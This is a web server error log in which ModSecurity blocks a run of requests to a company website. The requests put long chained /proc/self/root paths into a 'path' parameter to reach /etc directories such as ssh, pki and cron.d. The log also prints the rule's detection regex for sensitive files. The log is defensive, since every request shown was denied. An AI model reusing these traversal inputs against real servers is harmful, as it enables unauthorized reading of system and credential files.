[Tue Mar 17 08:54:44.426357 2026] [:error] [pid 2305:tid 140411641214720] [client 74.7.243.203:56430] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBBAQohV2v-7oj5HH2IAAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:54:45.631045 2026] [:error] [pid 11469:tid 140411725141760] [client 74.7.243.203:56438] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBBZDEJR9VXonE_-1JJwAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:54:46.960897 2026] [:error] [pid 2473:tid 140411548894976] [client 74.7.243.203:56442] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBBqBJNF7axNlVR0X4VwAAABc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:54:50.387384 2026] [:error] [pid 1210:tid 140411607643904] [client 74.7.243.203:56452] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBClKJy4A1bGlmj9BQbQAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:55:05.591024 2026] [:error] [pid 1961:tid 140411683178240] [client 74.7.243.203:34796] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBGXRXaaWotPICgYsgDgAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:55:15.204148 2026] [:error] [pid 7437:tid 140411574073088] [client 74.7.243.203:55728] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBIweiSKl8TjouI-b9UgAAA9Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:55:16.620142 2026] [:error] [pid 11293:tid 140411574073088] [client 74.7.241.46:53758] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBJNCmCSWTlPouqorGugAAANQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:55:48.116894 2026] [:error] [pid 2305:tid 140411574073088] [client 74.7.241.46:43346] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBRAQohV2v-7oj5HH2XwAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:55:49.496570 2026] [:error] [pid 2473:tid 140411725141760] [client 74.7.241.46:40404] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBRaBJNF7axNlVR0X4XwAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:55:51.631477 2026] [:error] [pid 2305:tid 140411624429312] [client 74.7.243.203:38372] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBRwQohV2v-7oj5HH2YwAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:55:51.823713 2026] [:error] [pid 1210:tid 140411716749056] [client 74.7.241.46:40418] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBR1KJy4A1bGlmj9BQfQAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:55:54.467390 2026] [:error] [pid 1016:tid 140411599251200] [client 74.7.241.46:40426] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBSpqmL8PQht4WJFlChQAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:55:55.761995 2026] [:error] [pid 11293:tid 140411540502272] [client 74.7.241.46:40440] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBS9CmCSWTlPouqorGwwAAANg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:55:57.092034 2026] [:error] [pid 1210:tid 140411733534464] [client 74.7.241.46:40442] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBTVKJy4A1bGlmj9BQfgAAAkE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:56:01.228244 2026] [:error] [pid 1210:tid 140411725141760] [client 74.7.241.46:41040] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBUVKJy4A1bGlmj9BQggAAAkI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:56:04.092481 2026] [:error] [pid 7437:tid 140411699963648] [client 74.7.241.46:41046] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBVAeiSKl8TjouI-b9XQAAA8U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:56:05.463569 2026] [:error] [pid 11293:tid 140411658000128] [client 74.7.243.203:50044] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBVdCmCSWTlPouqorGzQAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:56:06.685813 2026] [:error] [pid 2305:tid 140411574073088] [client 74.7.243.203:54428] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBVgQohV2v-7oj5HH2cQAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:56:10.907292 2026] [:error] [pid 2305:tid 140411649607424] [client 74.7.241.46:41056] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBWgQohV2v-7oj5HH2dQAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:56:12.225684 2026] [:error] [pid 1016:tid 140411674785536] [client 74.7.241.46:48764] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBXJqmL8PQht4WJFlCiQAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:56:21.251970 2026] [:error] [pid 7437:tid 140411548894976] [client 74.7.241.46:48776] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBZQeiSKl8TjouI-b9dgAAA9c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
